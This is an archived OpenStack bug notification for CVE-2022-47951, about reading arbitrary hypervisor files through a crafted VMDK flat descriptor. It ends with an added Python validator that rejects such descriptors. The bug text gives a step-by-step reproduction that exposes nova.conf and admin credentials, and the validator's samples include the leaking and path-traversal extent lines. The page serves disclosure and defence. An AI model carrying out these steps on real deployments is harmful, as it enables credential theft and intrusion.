yahoo-eng-team team mailing list archive

[Bug 1996188] Re: [OSSA-2023-002] Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951)

https://review.opendev.org/c/openstack/nova/+/871612 is now merged,
putting the bug report to Fix Released.

** Changed in: nova
   Importance: Undecided => Critical

** Changed in: nova
       Status: New => Confirmed

** Changed in: nova
       Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1996188

Title:
  [OSSA-2023-002] Arbitrary file access through custom VMDK flat
  descriptor (CVE-2022-47951)

Status in Cinder:
  In Progress
Status in Glance:
  Fix Released
Status in OpenStack Compute (nova):
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  The vulnerability managers received the following report from
  Sébastien Meriot with OVH via encrypted E-mail:

  Our OpenStack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system.
  After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).

  Here are the details:
  By using a VMDK file, you can dump any file on the hypervisor.
  1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
  2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0
  3. Upload the image: openstack image create --file leak.vmdk leak.vmdk
  4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance
  5. The instance won't boot, of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance
  6. Download the image: openstack image save --file leak-instance-image leak-instance-image
  7. You get access to the nova.conf file content and you can get access to the openstack admin creds.

  We are working on a fix and would be happy to share it with you if needed.
  We think it does affect Nova but it could affect Glance as well. We're not sure yet.

  [postscript per Arnaud Morin (amorin) in IRC]

  cinder also seems affected

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1996188/+subscriptions
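The report above hinges on a VMDK flat descriptor whose extent line names a file outside the image's own directory. The following example, added here and not part of the bug thread or of the Nova change linked in the comment, shows the defender-side check this class of bug calls for: parse the descriptor, allow-list the VMDK createType, and refuse any extent whose backing file does not resolve inside the directory the image lives in. The descriptor samples are constructed for this example (the FLAT extent line mirrors step 2 of the report); the allow-list contents and the image directory path are assumptions of this example, not settings taken from any project.

```python
"""Validate a VMDK descriptor before an image service hands it to qemu-img.

Example code added to this page; it is not Nova's, Glance's or Cinder's own
implementation.  The check is the generic one: trust neither the declared
subformat nor the extent file names in an operator-uploaded descriptor.
"""
import os
import re

# Standard VMDK createType values a deployment might accept.  The choice of
# this particular set is an assumption of the example, not a project default.
ALLOWED_CREATE_TYPES = {"monolithicSparse", "streamOptimized"}

_CREATE_TYPE_RE = re.compile(r'^\s*createType\s*=\s*"([^"]*)"\s*$', re.M)

# Extent line layout: ACCESS SIZE TYPE ["FILENAME" [OFFSET]]
# ZERO extents legitimately carry no file name.
_EXTENT_RE = re.compile(
    r'^\s*(RW|RDONLY|NOACCESS)\s+(\d+)\s+'
    r'(FLAT|SPARSE|ZERO|VMFS|VMFSSPARSE|VMFSRDM|VMFSRAW)'
    r'(?:\s+"([^"]*)")?(?:\s+(\d+))?\s*$',
    re.M,
)


def parse_descriptor(text):
    """Return (create_type, extents) where each extent is
    (access, sectors, kind, filename_or_None, offset)."""
    match = _CREATE_TYPE_RE.search(text)
    create_type = match.group(1) if match else None
    extents = []
    for line in _EXTENT_RE.finditer(text):
        access, sectors, kind, filename, offset = line.groups()
        extents.append(
            (access, int(sectors), kind, filename,
             int(offset) if offset is not None else 0)
        )
    return create_type, extents


def _escapes(base, filename):
    """True if filename is absolute or resolves outside base (e.g. via ..)."""
    if os.path.isabs(filename):
        return True
    target = os.path.normpath(os.path.join(base, filename))
    return not (target == base or target.startswith(base + os.sep))


def descriptor_problems(text, image_dir, allowed=ALLOWED_CREATE_TYPES):
    """Return a list of human-readable problems; an empty list means the
    descriptor passed both the subformat allow-list and the path check."""
    create_type, extents = parse_descriptor(text)
    problems = []
    if create_type not in allowed:
        problems.append("createType %r is not in the allowed set %s"
                        % (create_type, sorted(allowed)))
    base = os.path.normpath(image_dir)
    for _access, _sectors, kind, filename, _offset in extents:
        if filename is None:
            continue
        if _escapes(base, filename):
            problems.append("%s extent %r resolves outside %s"
                            % (kind, filename, base))
    return problems


def is_safe_descriptor(text, image_dir, allowed=ALLOWED_CREATE_TYPES):
    return not descriptor_problems(text, image_dir, allowed)


# Constructed sample descriptors.  The header/DDB lines are the usual ones
# qemu-img writes; only the createType and extent lines matter here.
_HEADER = '# Disk DescriptorFile\nversion=1\nCID=fffffffe\nparentCID=ffffffff\n'
_FOOTER = '\n# The Disk Data Base\n#DDB\nddb.virtualHWVersion = "4"\n'

SPARSE_OK = _HEADER + 'createType="monolithicSparse"\n\n' \
    '# Extent description\nRW 2048 SPARSE "leak.vmdk"\n' + _FOOTER
FLAT_OK = _HEADER + 'createType="monolithicFlat"\n\n' \
    '# Extent description\nRW 2048 FLAT "leak-flat.vmdk" 0\n' + _FOOTER
FLAT_LEAK = _HEADER + 'createType="monolithicFlat"\n\n' \
    '# Extent description\nRW 2048 FLAT "/etc/nova/nova.conf" 0\n' + _FOOTER
FLAT_TRAVERSAL = _HEADER + 'createType="monolithicFlat"\n\n' \
    'RW 2048 FLAT "../../etc/passwd" 0\nRW 2048 ZERO\n' + _FOOTER

# Assumed image directory for the example (no files are touched).
IMAGE_DIR = "/var/lib/nova/instances/_base"

if __name__ == "__main__":
    for name, desc in [("sparse", SPARSE_OK), ("flat", FLAT_OK),
                       ("leak", FLAT_LEAK), ("traversal", FLAT_TRAVERSAL)]:
        print(name, descriptor_problems(desc, IMAGE_DIR) or "ok")
```

With the default allow-list the leaking descriptor is rejected twice, once for its subformat and once for its extent path; if an operator deliberately permits monolithicFlat, the path containment check is what still stops it, which is why the two checks are kept independent rather than relying on the subformat alone.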